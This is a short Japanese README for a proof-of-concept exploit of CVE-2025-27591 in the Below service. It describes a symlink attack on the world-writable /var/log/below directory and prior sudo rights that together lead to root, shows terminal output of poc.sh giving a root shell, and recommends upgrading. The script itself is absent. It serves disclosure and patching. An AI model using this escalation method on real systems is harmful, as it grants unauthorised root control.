
CVE-2025-27591 の概念実証 (PoC) です。この脆弱性により、ローカルの非特権ユーザーがシンボリックリンク攻撃を介して権限を root まで昇格させることができます。
この脆弱性は Below サービス (v0.9.0 未満) に影響します。/var/log/below ディレクトリがワールド書き込み可能パーミッション (0777) で作成されるため、ローカルの非特権ユーザーがシンボリックリンクを置き換え、/etc/shadow などの重要なファイルを操作し、root への権限昇格が可能になります。
ローカルの非特権ユーザーは以下の方法で root に昇格できます:
/var/log/below/ がワールド書き込み可能パーミッション (0777) であり、error_root.log ファイルが存在する必要があります。foo@victim:~$ ls -l /var/log/ | grep below
drwxrwxrwx 3 root root 4096 Jul 8 20:45 below
sudoers レベルの権限が必要です。
foo@victim:~$ sudo -l
Matching Defaults entries for jacob on victim:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User foo may run the following commands on victim:
(ALL : ALL) NOPASSWD: /usr/bin/below
poc.sh ファイルを入手したら、必要なパーミッションを付与して実行すると、root になります。
foo@victim:/tmp$ chmod +x poc.sh
foo@victim:/tmp$ ./poc.sh
evil@victim:/tmp# id
uid=0(evil) gid=0(root) groups=0(root)
Below v0.9.0 以降にアップグレードしてください。このバージョンでは安全でない chmod ロジックが削除され、LogsDirectory=below などの systemd ユニット機能に依存しています。